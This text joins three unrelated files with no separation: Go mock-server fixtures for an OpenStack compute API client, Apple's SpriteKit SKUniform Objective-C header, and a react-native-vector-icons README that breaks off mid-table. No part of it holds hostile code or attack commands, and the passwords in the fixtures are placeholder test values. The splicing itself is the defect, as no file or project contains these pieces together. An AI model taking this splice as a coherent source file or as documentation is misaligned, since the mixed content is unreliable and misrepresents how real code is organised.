"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "bookmark"
}
],
"key_name": null,
"image": {
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:task_state": null,
"OS-EXT-STS:vm_state": "active",
"OS-EXT-SRV-ATTR:instance_name": "instance-0000001d",
"OS-SRV-USG:launched_at": "2014-09-25T13:04:49.000000",
"OS-EXT-SRV-ATTR:hypervisor_hostname": "devstack",
"flavor": {
"id": "1",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark"
}
]
},
"id": "9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"security_groups": [
{
"name": "default"
}
],
"OS-SRV-USG:terminated_at": null,
"OS-EXT-AZ:availability_zone": "nova",
"user_id": "9349aff8be7545ac9d2f1d00999a23cd",
"name": "derp",
"created": "2014-09-25T13:04:41Z",
"tenant_id": "fcad67a6189847c4aecfa3c81a05783b",
"OS-DCF:diskConfig": "MANUAL",
"os-extended-volumes:volumes_attached": [],
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"metadata": {}
}
]
}
`
// SingleServerBody is the canned body of a Get request on an existing server.
const SingleServerBody = `
{
"server": {
"status": "ACTIVE",
"updated": "2014-09-25T13:04:49Z",
"hostId": "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
"OS-EXT-SRV-ATTR:host": "devstack",
"addresses": {
"private": [
{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:9e:89:be",
"version": 4,
"addr": "10.0.0.31",
"OS-EXT-IPS:type": "fixed"
}
]
},
"links": [
{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "self"
},
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "bookmark"
}
],
"key_name": null,
"image": {
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:task_state": null,
"OS-EXT-STS:vm_state": "active",
"OS-EXT-SRV-ATTR:instance_name": "instance-0000001d",
"OS-SRV-USG:launched_at": "2014-09-25T13:04:49.000000",
"OS-EXT-SRV-ATTR:hypervisor_hostname": "devstack",
"flavor": {
"id": "1",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark"
}
]
},
"id": "9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"security_groups": [
{
"name": "default"
}
],
"OS-SRV-USG:terminated_at": null,
"OS-EXT-AZ:availability_zone": "nova",
"user_id": "9349aff8be7545ac9d2f1d00999a23cd",
"name": "derp",
"created": "2014-09-25T13:04:41Z",
"tenant_id": "fcad67a6189847c4aecfa3c81a05783b",
"OS-DCF:diskConfig": "MANUAL",
"os-extended-volumes:volumes_attached": [],
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"metadata": {}
}
}
`
var (
// ServerHerp is a Server struct that should correspond to the first result in ServerListBody.
ServerHerp = Server{
Status: "ACTIVE",
Updated: "2014-09-25T13:10:10Z",
HostID: "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
Addresses: map[string]interface{}{
"private": []interface{}{
map[string]interface{}{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:7c:1b:2b",
"version": float64(4),
"addr": "10.0.0.32",
"OS-EXT-IPS:type": "fixed",
},
},
},
Links: []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"rel": "self",
},
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"rel": "bookmark",
},
},
Image: map[string]interface{}{
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark",
},
},
},
Flavor: map[string]interface{}{
"id": "1",
"links": []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark",
},
},
},
ID: "ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
UserID: "9349aff8be7545ac9d2f1d00999a23cd",
Name: "herp",
Created: "2014-09-25T13:10:02Z",
TenantID: "fcad67a6189847c4aecfa3c81a05783b",
Metadata: map[string]interface{}{},
SecurityGroups: []map[string]interface{}{
map[string]interface{}{
"name": "default",
},
},
}
// ServerDerp is a Server struct that should correspond to the second server in ServerListBody.
ServerDerp = Server{
Status: "ACTIVE",
Updated: "2014-09-25T13:04:49Z",
HostID: "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
Addresses: map[string]interface{}{
"private": []interface{}{
map[string]interface{}{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:9e:89:be",
"version": float64(4),
"addr": "10.0.0.31",
"OS-EXT-IPS:type": "fixed",
},
},
},
Links: []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "self",
},
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "bookmark",
},
},
Image: map[string]interface{}{
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark",
},
},
},
Flavor: map[string]interface{}{
"id": "1",
"links": []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark",
},
},
},
ID: "9e5476bd-a4ec-4653-93d6-72c93aa682ba",
UserID: "9349aff8be7545ac9d2f1d00999a23cd",
Name: "derp",
Created: "2014-09-25T13:04:41Z",
TenantID: "fcad67a6189847c4aecfa3c81a05783b",
Metadata: map[string]interface{}{},
SecurityGroups: []map[string]interface{}{
map[string]interface{}{
"name": "default",
},
},
}
)
// HandleServerCreationSuccessfully sets up the test server to respond to a server creation request
// with a given response.
func HandleServerCreationSuccessfully(t *testing.T, response string) {
th.Mux.HandleFunc("/servers", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{
"server": {
"name": "derp",
"imageRef": "f90f6034-2570-4974-8351-6b49732ef2eb",
"flavorRef": "1"
}
}`)
w.WriteHeader(http.StatusAccepted)
w.Header().Add("Content-Type", "application/json")
fmt.Fprintf(w, response)
})
}
// HandleServerListSuccessfully sets up the test server to respond to a server List request.
func HandleServerListSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/detail", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.Header().Add("Content-Type", "application/json")
r.ParseForm()
marker := r.Form.Get("marker")
switch marker {
case "":
fmt.Fprintf(w, ServerListBody)
case "9e5476bd-a4ec-4653-93d6-72c93aa682ba":
fmt.Fprintf(w, `{ "servers": [] }`)
default:
t.Fatalf("/servers/detail invoked with unexpected marker=[%s]", marker)
}
})
}
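// Usage sketch (assumed test wiring): a test would typically call th.SetupHTTP(), defer
// th.TeardownHTTP(), register HandleServerListSuccessfully(t), and then page through the
// detail listing asserting that ServerHerp and ServerDerp are returned.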
// HandleServerDeletionSuccessfully sets up the test server to respond to a server deletion request.
func HandleServerDeletionSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/asdfasdfasdf", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "DELETE")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.WriteHeader(http.StatusNoContent)
})
}
// HandleServerGetSuccessfully sets up the test server to respond to a server Get request.
func HandleServerGetSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestHeader(t, r, "Accept", "application/json")
fmt.Fprintf(w, SingleServerBody)
})
}
// HandleServerUpdateSuccessfully sets up the test server to respond to a server Update request.
func HandleServerUpdateSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "PUT")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestHeader(t, r, "Accept", "application/json")
th.TestHeader(t, r, "Content-Type", "application/json")
th.TestJSONRequest(t, r, `{ "server": { "name": "new-name" } }`)
fmt.Fprintf(w, SingleServerBody)
})
}
// HandleAdminPasswordChangeSuccessfully sets up the test server to respond to a server password
// change request.
func HandleAdminPasswordChangeSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/action", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{ "changePassword": { "adminPass": "new-password" } }`)
w.WriteHeader(http.StatusAccepted)
})
}
// HandleRebootSuccessfully sets up the test server to respond to a reboot request with success.
func HandleRebootSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/action", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{ "reboot": { "type": "SOFT" } }`)
w.WriteHeader(http.StatusAccepted)
})
}
// HandleRebuildSuccessfully sets up the test server to respond to a rebuild request with success.
func HandleRebuildSuccessfully(t *testing.T, response string) {
th.Mux.HandleFunc("/servers/1234asdf/action", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `
{
"rebuild": {
"name": "new-name",
"adminPass": "swordfish",
"imageRef": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"accessIPv4": "1.2.3.4"
}
}
`)
w.Header().Add("Content-Type", "application/json")
w.WriteHeader(http.StatusAccepted)
fmt.Fprintf(w, response)
})
}
// HandleServerRescueSuccessfully sets up the test server to respond to a server Rescue request.
func HandleServerRescueSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/action", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{ "rescue": { "adminPass": "1234567890" } }`)
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{ "adminPass": "1234567890" }`))
})
}
// HandleMetadatumGetSuccessfully sets up the test server to respond to a metadatum Get request.
func HandleMetadatumGetSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata/foo", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestHeader(t, r, "Accept", "application/json")
w.Header().Add("Content-Type", "application/json")
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{ "meta": {"foo":"bar"}}`))
})
}
// HandleMetadatumCreateSuccessfully sets up the test server to respond to a metadatum Create request.
func HandleMetadatumCreateSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata/foo", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "PUT")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{
"meta": {
"foo": "bar"
}
}`)
w.Header().Add("Content-Type", "application/json")
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{ "meta": {"foo":"bar"}}`))
})
}
// HandleMetadatumDeleteSuccessfully sets up the test server to respond to a metadatum Delete request.
func HandleMetadatumDeleteSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata/foo", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "DELETE")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.WriteHeader(http.StatusNoContent)
})
}
// HandleMetadataGetSuccessfully sets up the test server to respond to a metadata Get request.
func HandleMetadataGetSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestHeader(t, r, "Accept", "application/json")
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{ "metadata": {"foo":"bar", "this":"that"}}`))
})
}
// HandleMetadataResetSuccessfully sets up the test server to respond to a metadata Create request.
func HandleMetadataResetSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "PUT")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{
"metadata": {
"foo": "bar",
"this": "that"
}
}`)
w.Header().Add("Content-Type", "application/json")
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{ "metadata": {"foo":"bar", "this":"that"}}`))
})
}
// HandleMetadataUpdateSuccessfully sets up the test server to respond to a metadata Update request.
func HandleMetadataUpdateSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{
"metadata": {
"foo": "baz",
"this": "those"
}
}`)
w.Header().Add("Content-Type", "application/json")
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{ "metadata": {"foo":"baz", "this":"those"}}`))
})
}
// ListAddressesExpected represents an expected response from a ListAddresses request.
var ListAddressesExpected = map[string][]Address{
"public": []Address{
Address{
Version: 4,
Address: "80.56.136.39",
},
Address{
Version: 6,
Address: "2001:4800:790e:510:be76:4eff:fe04:82a8",
},
},
"private": []Address{
Address{
Version: 4,
Address: "10.880.3.154",
},
},
}
// HandleAddressListSuccessfully sets up the test server to respond to a ListAddresses request.
func HandleAddressListSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/asdfasdfasdf/ips", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.Header().Add("Content-Type", "application/json")
fmt.Fprintf(w, `{
"addresses": {
"public": [
{
"version": 4,
"addr": "50.56.176.35"
},
{
"version": 6,
"addr": "2001:4800:780e:510:be76:4eff:fe04:84a8"
}
],
"private": [
{
"version": 4,
"addr": "10.180.3.155"
}
]
}
}`)
})
}
// ListNetworkAddressesExpected represents an expected response from a ListAddressesByNetwork request.
var ListNetworkAddressesExpected = []Address{
Address{
Version: 4,
Address: "50.56.176.35",
},
Address{
Version: 6,
Address: "2001:4800:780e:510:be76:4eff:fe04:84a8",
},
}
// HandleNetworkAddressListSuccessfully sets up the test server to respond to a ListAddressesByNetwork request.
func HandleNetworkAddressListSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/asdfasdfasdf/ips/public", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.Header().Add("Content-Type", "application/json")
fmt.Fprintf(w, `{
"public": [
{
"version": 4,
"addr": "50.56.176.35"
},
{
"version": 6,
"addr": "2001:4800:780e:510:be76:4eff:fe04:84a8"
}
]
}`)
})
}
/**
@header
Uniform defines the type and data associated with a custom fragment shader, SKShader.
@copyright 2013 Apple, Inc. All rights reserved.
*/
#import <SpriteKit/SpriteKitBase.h>
#import <SpriteKit/SKTexture.h>
#import <GLKit/GLKMath.h>
typedef NS_ENUM(NSInteger, SKUniformType) {
SKUniformTypeNone = 0,
SKUniformTypeFloat = 1,
SKUniformTypeFloatVector2 = 2,
SKUniformTypeFloatVector3 = 3,
SKUniformTypeFloatVector4 = 4,
SKUniformTypeFloatMatrix2 = 5,
SKUniformTypeFloatMatrix3 = 6,
SKUniformTypeFloatMatrix4 = 7,
SKUniformTypeTexture = 8,
} NS_ENUM_AVAILABLE(10_10, 8_0);
NS_ASSUME_NONNULL_BEGIN
NS_CLASS_AVAILABLE(10_10, 8_0)
SK_EXPORT @interface SKUniform : NSObject <NSCopying, NSCoding>
/**
Create a shader uniform with a given name.
@param name the name of the shader uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name;
/**
Create a shader uniform with a given name, and texture data
@param name the name of the shader uniform.
@param texture the texture data associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name texture:(SKTexture*)texture;
/**
Create a shader uniform with a given name, and a float value
@param name the name of the shader uniform.
@param value the floating point value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name float:(float)value;
/**
Create a shader uniform with a given name, and a float vector2 value
@param name the name of the shader uniform.
@param value the float vector2 value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatVector2:(GLKVector2)value;
/**
Create a shader uniform with a given name, and a float vector3 value
@param name the name of the shader uniform.
@param value the float vector3 value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatVector3:(GLKVector3)value;
/**
Create a shader uniform with a given name, and a float vector4 value
@param name the name of the shader uniform.
@param value the float vector4 value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatVector4:(GLKVector4)value;
/**
Create a shader uniform with a given name, and a 2x2 matrix value
@param name the name of the shader uniform.
@param value the 2x2 matrix value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatMatrix2:(GLKMatrix2)value;
/**
Create a shader uniform with a given name, and a 3x3 matrix value
@param name the name of the shader uniform.
@param value the 3x3 matrix value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatMatrix3:(GLKMatrix3)value;
/**
Create a shader uniform with a given name, and a 4x4 matrix value
@param name the name of the shader uniform.
@param value the 4x4 matrix value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatMatrix4:(GLKMatrix4)value;
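/*
 Illustrative usage (not part of the original header; `myShader.uniforms` assumes an SKShader instance):
   SKUniform *timeUniform = [SKUniform uniformWithName:@"u_time" float:0.0f];
   myShader.uniforms = @[ timeUniform ];
 */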
/* The name by which this uniform will be referenced in a shader */
@property (nonatomic, readonly) NSString *name;
/* Once created, a uniform is locked to a specific type; you may only access the property of this type */
@property (nonatomic, readonly) SKUniformType uniformType;
/* Access to the texture data associated with the current uniform */
@property (nonatomic, retain, nullable) SKTexture *textureValue;
/* Access to the float value associated with the current uniform */
@property float floatValue;
/* Access to the float vector 2 value associated with the current uniform */
@property GLKVector2 floatVector2Value;
/* Access to the float vector 3 value associated with the current uniform */
@property GLKVector3 floatVector3Value;
/* Access to the float vector 4 value associated with the current uniform */
@property GLKVector4 floatVector4Value;
/* Access to the 2x2 matrix value associated with the current uniform */
@property GLKMatrix2 floatMatrix2Value;
/* Access to the 3x3 matrix value associated with the current uniform */
@property GLKMatrix3 floatMatrix3Value;
/* Access to the 4x4 matrix value associated with the current uniform */
@property GLKMatrix4 floatMatrix4Value;
- (instancetype)initWithName:(NSString *)name;
- (instancetype)initWithName:(NSString *)name texture:(nullable SKTexture*)texture;
- (instancetype)initWithName:(NSString *)name float:(float)value;
- (instancetype)initWithName:(NSString *)name floatVector2:(GLKVector2)value;
- (instancetype)initWithName:(NSString *)name floatVector3:(GLKVector3)value;
- (instancetype)initWithName:(NSString *)name floatVector4:(GLKVector4)value;
- (instancetype)initWithName:(NSString *)name floatMatrix2:(GLKMatrix2)value;
- (instancetype)initWithName:(NSString *)name floatMatrix3:(GLKMatrix3)value;
- (instancetype)initWithName:(NSString *)name floatMatrix4:(GLKMatrix4)value;
@end
NS_ASSUME_NONNULL_END

[](https://travis-ci.org/oblador/react-native-vector-icons) [](https://npmjs.com/package/react-native-vector-icons) [](https://npmjs.com/package/react-native-vector-icons)
Perfect for buttons, logos and nav/tab bars. Easy to extend, style and integrate into your project.
## Table of Contents
- [Bundled Icon Sets](#bundled-icon-sets)
- [Installation](#installation)
- [iOS](#ios)
- [Android](#android)
- [OSX](#osx-via-react-native-desktop)
- [Windows](#windows-via-react-native-windows)
- [Web](#web-with-webpack)
- [Upgrading](#upgrading)
- [Icon Component](#icon-component)
- [Icon.Button Component](#iconbutton-component)
- [Usage as PNG image/source object](#usage-as-png-imagesource-object)
- [Usage with TabBarIOS](#usage-with-tabbarios)
- [Multi-style fonts](#multi-style-fonts)
- [Custom Fonts](#custom-fonts)
- [Animation](#animation)
- [Examples](#examples)
- [Generating your own icon set from a CSS file](#generating-your-own-icon-set-from-a-css-file)
- [Changelog](#changelog)
- [Troubleshooting](#troubleshooting)
- [License](#license)
## Sponsoring
If you find the library useful, please consider [sponsoring](https://github.com/sponsors/oblador). Planned work includes splitting the repo into a monorepo, which would enable individual versioning of icon sets, better performance, a smaller bundle, and easier publishing of community icon sets.
## Bundled Icon Sets
[Browse all](https://oblador.github.io/react-native-vector-icons/).
- [`AntDesign`](https://ant.design/) by AntFinance (**297** icons)
- [`Entypo`](http://entypo.com) by Daniel Bruce (**411** icons)
- [`EvilIcons`](http://evil-icons.io) by Alexander Madyankin & Roman Shamin (v1.10.1, **70** icons)
- [`Feather`](http://feathericons.com) by Cole Bemis & Contributors (v4.28.0, **285** icons)
- [`FontAwesome`](http://fortawesome.github.io/Font-Awesome/icons/) by Dave Gandy (v4.7.0, **675** icons)
- [`FontAwesome 5`](https://fontawesome.com) by Fonticons, Inc. (v5.13.0, 1588 (free) **7842** (pro) icons)
- [`Fontisto`](https://github.com/kenangundogan/fontisto) by Kenan Gündoğan (v3.0.4, **615** icons)
- [`Foundation`](http://zurb.com/playground/foundation-icon-fonts-3) by ZURB, Inc. (v3.0, **283** icons)
- [`Ionicons`](https://ionicons.com/) by Iconic Framework (v5.0.1, **1227** icons)
- [`MaterialIcons`](https://www.google.com/design/icons/) by Google, Inc. (v4.0.0, **1547** icons)
- [`MaterialCommunityIcons`](https://materialdesignicons.com/) by MaterialDesignIcons.com (v5.3.45, **5346** icons)
- [`Octicons`](http://octicons.github.com) by Github, Inc. (v8.4.1, **184** icons)
- [`Zocial`](http://zocial.smcllns.com/) by Sam Collins (v1.0, **100** icons)
- [`SimpleLineIcons`](https://simplelineicons.github.io/) by Sabbir & Contributors (v2.4.1, **189** icons)
## Installation
1. Run: `$ npm install --save react-native-vector-icons`
2. For each platform (iOS/Android/Windows) you plan to use, follow one of the options for the corresponding platform.
3. If you intend to use FontAwesome 5, check out [`this guide`](FONTAWESOME5.md) to get you started.
### iOS
#### Option: Manually
If you want to use any of the bundled icons, you need to add the icon fonts to your Xcode project. Just follow these steps:
- Browse to `node_modules/react-native-vector-icons` and drag the folder `Fonts` (or just the ones you want) to your project in Xcode. **Make sure your app is checked under "Add to targets" and that "Create groups" is checked if you add the whole folder**. Not familiar with Xcode? Try [this article](https://medium.com/@vimniky/how-to-use-vector-icons-in-your-react-native-project-8212ac6a8f06)
- Edit `Info.plist` and add a property called **Fonts provided by application** (or `UIAppFonts` if Xcode won't autocomplete/not using Xcode) and type in the files you just added. It will look something like this:

<details><summary>List of all available fonts to copy & paste in info.plist</summary>
```xml
<key>UIAppFonts</key>
<array>
<string>AntDesign.ttf</string>
<string>Entypo.ttf</string>
<string>EvilIcons.ttf</string>
<string>Feather.ttf</string>
<string>FontAwesome.ttf</string>
<string>FontAwesome5_Brands.ttf</string>
<string>FontAwesome5_Regular.ttf</string>
<string>FontAwesome5_Solid.ttf</string>
<string>Foundation.ttf</string>
<string>Ionicons.ttf</string>
<string>MaterialIcons.ttf</string>
<string>MaterialCommunityIcons.ttf</string>
<string>SimpleLineIcons.ttf</string>
<string>Octicons.ttf</string>
<string>Zocial.ttf</string>
<string>Fontisto.ttf</string>
</array>
```
</details>
<br>
_Note: you need to recompile your project after adding new fonts; also ensure that they appear under **Copy Bundle Resources** in **Build Phases**._
If you want to use the TabBar/NavigatorIOS integration or use `getImageSource`/`getImageSourceSync`, then you need to add `RNVectorIcons.xcodeproj` to **Libraries** and add `libRNVectorIcons.a` to **Link Binary With Libraries** under **Build Phases**. [More info and screenshots about how to do this is available in the React Native documentation](https://reactnative.dev/docs/linking-libraries-ios.html#content).
#### Option: With `react-native link`
`$ react-native link react-native-vector-icons`
_Note: Some users are having trouble using this method, try one of the others if you are too._
#### Option: With [CocoaPods](https://cocoapods.org/)
Add the following to your `Podfile` and run `pod update`:
```
pod 'RNVectorIcons', :path => '../node_modules/react-native-vector-icons'
```
Edit `Info.plist` as described above.
If you are using `use_frameworks!` in your `Podfile`, you instead need to dynamically load the icon font by calling `Icon.loadFont()` when bootstrapping your application.
_Note: You must be consuming React itself via CocoaPods for this to work, see [React Native documentation](https://reactnative.dev/docs/integration-with-existing-apps) on how to set that up._
### Android
#### Option: With Gradle (recommended)
This method has the advantage of fonts being copied from this module at build time so that the fonts and JS are always in sync, making upgrades painless.
Edit `android/app/build.gradle` ( NOT `android/build.gradle` ) and add the following:
```gradle
apply from: "../../node_modules/react-native-vector-icons/fonts.gradle"
```
To customize the files being copied, add the following instead:
```gradle
project.ext.vectoricons = [
iconFontNames: [ 'MaterialIcons.ttf', 'EvilIcons.ttf' ] // Name of the font files you want to copy
]
apply from: "../../node_modules/react-native-vector-icons/fonts.gradle"
```
#### Option: Manually
- Copy the contents in the `Fonts` folder to `android/app/src/main/assets/fonts` (_note lowercase fonts folder_).
##### Integrating library for `getImageSource` support
These steps are optional and only needed if you want to use the `Icon.getImageSource` function.
- Edit `android/settings.gradle` to look like this (without the +):
```diff
rootProject.name = 'MyApp'
include ':app'
+ include ':react-native-vector-icons'
+ project(':react-native-vector-icons').projectDir = new File(rootProject.projectDir, '../node_modules/react-native-vector-icons/android')
```
- Edit `android/app/build.gradle` (note: **app** folder) to look like this:
```diff
apply plugin: 'com.android.application'
android {
...
}
dependencies {
compile fileTree(dir: 'libs', include: ['*.jar'])
compile "com.android.support:appcompat-v7:23.0.1"
compile "com.facebook.react:react-native:+" // From node_modules
+ compile project(':react-native-vector-icons')
}
```
- Edit your `MainApplication.java` (deep in `android/app/src/main/java/...`) to look like this (note **two** places to edit):
```diff
package com.myapp;
+ import com.oblador.vectoricons.VectorIconsPackage;
....
@Override
protected List<ReactPackage> getPackages() {
return Arrays.<ReactPackage>asList(
new MainReactPackage()
+ , new VectorIconsPackage()
);
}
}
```
### OSX via [`react-native-desktop`](https://github.com/ptmt/react-native-desktop)
- Browse to `node_modules/react-native-vector-icons` and drag the folder `Fonts` to your project in Xcode. **Make sure your app is checked under "Add to targets" and that "Create folder references" is checked**.
- Edit `Info.plist` and add a property called **Application fonts resource path** (or `ATSApplicationFontsPath` if Xcode won't autocomplete/not using Xcode) and type `Fonts` as the value.
_Note: you need to recompile your project after adding new fonts; also ensure that the `Fonts` folder appears under **Copy Bundle Resources** in **Build Phases**._
### Windows via [`react-native-windows`](https://github.com/ReactWindows/react-native-windows)
- Open your solution in Visual Studio, right click the Assets folder in your solution, click **Add Existing**.
- Browse to the `node_modules\react-native-vector-icons\Fonts` folder, select the required font files
- Click the **Add** drop-down and select **Add as Link**.
- Set **Copy To Output Directory** property of each font file to **Copy if newer**
_Note: you need to recompile your project after adding new fonts._
### Web (with [webpack](https://webpack.js.org/))
In your webpack configuration file, add a section to handle ttf files using url-loader (or file-loader)
```js
{
test: /\.ttf$/,
loader: "url-loader", // or directly file-loader
include: path.resolve(__dirname, "node_modules/react-native-vector-icons"),
},
```
Then consume those files in your JavaScript entry point to get the bundled url and inject a style tag in your page:
```js
// Use prebuilt version of RNVI in dist folder
import Icon from 'react-native-vector-icons/dist/FontAwesome';
// Generate required css
import iconFont from 'react-native-vector-icons/Fonts/FontAwesome.ttf';
const iconFontStyles = `@font-face {
src: url(${iconFont});
font-family: FontAwesome;
}`;
// Create stylesheet
const style = document.createElement('style');
style.type = 'text/css';
if (style.styleSheet) {
style.styleSheet.cssText = iconFontStyles;
} else {
style.appendChild(document.createTextNode(iconFontStyles));
}
// Inject stylesheet
document.head.appendChild(style);
```
## Upgrading
Upgrading this package often requires the font files linked to your projects to be updated as well. If the automatic linking works for you, running this again should update the fonts. Otherwise you need to follow the steps outlined in the [installation](#installation) section.
## `Icon` Component
You can either use one of the bundled icons above or roll your own custom font.
```js
import Icon from 'react-native-vector-icons/FontAwesome';
const myIcon = <Icon name="rocket" size={30} color="#900" />;
```
### Properties
Any [Text property](https://reactnative.dev/docs/text.html) and the following:
| Prop | Description | Default |
| ----------- | ----------------------------------------------------------------------- | ----------- |
